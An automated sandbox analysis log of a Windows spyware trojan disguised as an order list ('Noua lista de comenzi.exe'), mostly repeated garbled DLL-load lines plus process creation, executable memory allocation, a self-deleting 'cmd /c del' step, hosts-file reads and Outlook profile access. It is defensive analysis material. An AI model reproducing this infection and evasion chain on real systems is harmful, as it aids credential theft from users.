          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2???~?.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2???~?.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2???~?.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2???~?.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2???~?.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l .dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??i.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??i.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??i.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??i.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ????.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ?l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???2.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ???b.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l .dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???t.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l .dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l .dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???t.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?f???.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2?????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l .dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??i.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ????.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ?l.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???2.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ???b.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??.dll
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeSection loaded: ??l.dll
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: 72480000 page no access
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: 72480000 page read and write
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeMemory allocated: 72481000 page read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page no access
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72481000 page read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page execute and read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page no access
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72480000 page read and write
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeMemory allocated: 72481000 page read and write
          Source: Noua lista de comenzi.exeVirustotal: Detection: 32%
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeFile read: C:\Users\user\Desktop\Noua lista de comenzi.exeJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Noua lista de comenzi.exe "C:\Users\user\Desktop\Noua lista de comenzi.exe"
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Contacts\Tdfgwnfyyv.exe "C:\Users\user\Contacts\Tdfgwnfyyv.exe"
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\DpiScaling.exe"
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Tdfgwnfyyvslxmhqyfimidqqywchnji[1]Jump to behavior
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Fg00t0t5xJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/8@26/17
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Noua lista de comenzi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Contacts\Tdfgwnfyyv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
